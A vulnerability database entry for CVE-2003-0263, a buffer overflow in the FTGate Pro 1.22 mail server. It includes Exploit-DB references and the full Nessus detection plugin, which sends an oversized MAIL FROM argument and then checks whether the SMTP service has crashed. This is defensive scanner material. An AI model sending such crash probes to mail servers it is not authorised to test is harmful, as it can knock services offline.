Vulnerabilities > CVE-2003-0263 - Buffer Overflow vulnerability in Floosietek Ftgatepro 1.22 (1328)

CVSS 7.5 - HIGH
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
PARTIAL
network
low complexity
floosietek
nessus
exploit available

Summary

Multiple buffer overflows in Floosietek FTGate Pro Mail Server (FTGatePro) 1.22 allow remote attackers to execute arbitrary code via long (1) MAIL FROM or (2) RCPT TO commands.

Vulnerable Configurations

Part Description Count
Application
Floosietek
1

Exploit-Db

  • description: Floosietek FTGate PRO 1.22 SMTP RCPT TO Buffer Overflow Vulnerability. CVE-2003-0263. DoS exploit for Windows platform
    id: EDB-ID:22569
    last seen: 2016-02-02
    modified: 2003-05-06
    published: 2003-05-06
    reporter: Dennis Rand
    source: https://www.exploit-db.com/download/22569/
    title: Floosietek FTGate PRO 1.22 SMTP RCPT TO Buffer Overflow Vulnerability
  • description: Floosietek FTGate PRO 1.22 SMTP MAIL FROM Buffer Overflow Vulnerability. CVE-2003-0263. DoS exploit for Windows platform
    id: EDB-ID:22568
    last seen: 2016-02-02
    modified: 2003-05-06
    published: 2003-05-06
    reporter: Dennis Rand
    source: https://www.exploit-db.com/download/22568/
    title: Floosietek FTGate PRO 1.22 SMTP MAIL FROM Buffer Overflow Vulnerability

Nessus

NASL family: SMTP problems
NASL id: FTGATE_PRO_DOS.NASL
description: The remote SMTP server is running FT Gate Pro. There is a remote stack-based buffer overflow vulnerability in this version. This issue can be exploited by supplying a very long argument to the 'MAIL FROM' and 'RCPT TO' SMTP commands.
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 11579
published: 2003-05-06
reporter: This script is Copyright (C) 2003-2018 Tenable Network Security, Inc.
source: https://www.tenable.com/plugins/nessus/11579
title: FTGatePro Mail Server Multiple Command Remote Overflow
code
#
# (C) Tenable Network Security, Inc.
#

# Ref:
# From: "Dennis Rand" <[email protected]>
# To: "Vulnwatch@Vulnwatch. Org" <[email protected]>,
# Date: Tue, 6 May 2003 14:57:25 +0200
# Subject: [VulnWatch] Multiple Buffer Overflow Vulnerabilities Found in FTGate Pro Mail Server v. 1.22 (1328)


include("compat.inc");

# Registration block: executed only when `description` is set, i.e. when the
# plugin's metadata is being read. It declares identifiers, report text,
# scoring and scheduling hints, then exits before any network traffic is sent.
if (description)
{
 # Plugin identity and revision stamps.
 script_id(11579);
 script_version("1.20");
 script_cvs_date("Date: 2018/11/15 20:50:24");

 # Cross-references. Two Bugtraq IDs are listed for the single CVE --
 # presumably one per affected SMTP command; confirm against the advisories.
 script_cve_id("CVE-2003-0263");
 script_bugtraq_id(7506, 7508);

 script_name(english:"FTGatePro Mail Server Multiple Command Remote Overflow");
 script_summary(english:"Checks for FTgate");

 # NOTE(review): the synopsis reports only a denial of service, while the
 # description below also states that code execution is possible. Readers who
 # triage on the synopsis alone may under-rate this finding.
 script_set_attribute(attribute:"synopsis", value:
"The remote service is vulnerable to a denial of service.");
 script_set_attribute(attribute:"description", value:
"The remote SMTP server is running FT Gate Pro.

There is a remote stack-based buffer overflow vulnerability in this
version.  This issue can be exploited by supplying a very long
argument to the 'MAIL FROM' and 'RCPT TO' SMTP commands.

A remote attacker could use this to crash the SMTP server, or
possibly execute arbitrary code.");
 script_set_attribute(
   attribute:"see_also",
   value:"https://seclists.org/vulnwatch/2003/q2/54"
 );
 # Remediation text shown to the operator in the report.
 script_set_attribute(attribute:"solution", value:
"Upgrade to FTgate Pro Mail Server v. 1.22 Hotfix 1330 or later.");
 # NOTE(review): this base vector scores availability impact only
 # (C:N/I:N/A:P), matching the synopsis rather than the "possibly execute
 # arbitrary code" wording in the description. Confirm which severity the
 # plugin is meant to report before relying on it for prioritisation.
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
 # Temporal metrics: proof-of-concept exploit code (E:POC), official fix
 # available (RL:OF), report confirmed (RC:C).
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");

 script_set_attribute(attribute:"plugin_publication_date", value:"2003/05/06");
 script_set_attribute(attribute:"vuln_publication_date", value:"2003/05/06");

 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();

 # ACT_DENIAL marks this as a check that can take the target service down.
 # Scanners typically skip this category when safe checks are enabled --
 # confirm against the scan policy before running it on production mail hosts.
 script_category(ACT_DENIAL);
 script_copyright(english:"This script is Copyright (C) 2003-2018 Tenable Network Security, Inc.");
 script_family(english:"SMTP problems");

 # Scheduling: run after SMTP service detection, and only against hosts with
 # an SMTP service recorded or TCP port 25 open.
 script_dependencie("smtpserver_detect.nasl");
 script_require_ports("Services/smtp", 25);
 exit(0);
}

#
# The script code starts here
#

include("global_settings.inc");
include("smtp_func.inc");
include("misc_func.inc");

# Detection logic. The script identifies FTGatePro by banner, sends one
# oversized MAIL FROM argument, then reconnects and reports if the service no
# longer answers. The finding is therefore inferred from a crash, not from a
# version comparison.

# Runs only when report_paranoia is at least 1; at lower settings the script
# exits without testing because, per the exit message, the result is prone to
# false positives.
if (report_paranoia < 1) exit(0, "This script is prone to false positive.");

# Resolve the SMTP port (default 25) and stop unless the greeting banner
# contains "FTGatePro" (`>!<` is the "is not a substring of" operator).
# NOTE(review): only the product name is matched; no version or hotfix level
# is compared, so a server already at Hotfix 1330 or later is still probed.
port = get_service(svc:"smtp", default: 25, exit_on_fail: 1);
banner = get_smtp_banner(port:port);
if (! banner || "FTGatePro" >!< banner)
 exit(0, "The remote SMTP server is not FTGatePro");

# First connection: read the greeting, send HELO, then a MAIL FROM whose
# address has 2400 filler characters (crap()) on each side of the '@'.
# The replies stored in `r` are not inspected. RCPT TO is not exercised by
# this script, so the result covers the MAIL FROM path only.
soc = open_sock_tcp(port);
if (!soc) exit(1, "Cannot connect to TCP port "+port+".");

   r = smtp_recv_banner(socket:soc);

   send(socket:soc, data:string("HELO there\r\n"));
   r = recv_line(socket:soc, length:4096);

   send(socket:soc, data:string("MAIL FROM: ", crap(2400), "@", crap(2400),".com\r\n\r\n"));
   # Short (1 s) read so the script does not stall if the server stopped responding.
   r = recv_line(socket:soc, length:4096, timeout:1);
   close(soc);

# Second connection: liveness check. A failed reconnect is reported only when
# service_is_dead() gives a positive result; an "alive or timeout" answer is
# treated as inconclusive and ends the script with an error instead.
# A positive finding means the MTA stopped answering after the probe, so the
# service is likely down and will need a restart -- schedule accordingly.
soc = open_sock_tcp(port);
if (! soc)
{
  if (service_is_dead(port: port) <= 0)	# alive or timeout
    exit(1, "Could not reconnect to port "+port+".");
  security_warning(port:port, extra:string("\nThe remote MTA died.\n"));
  exit(0);
}

# The port still accepts connections: report only if no SMTP greeting is
# returned. If a banner is received, nothing is reported.
   r = smtp_recv_banner(socket:soc);
if( ! r)
 security_warning(port:port, extra:string("\nThe remote MTA does not display its banner anymore.\n"));

   close(soc);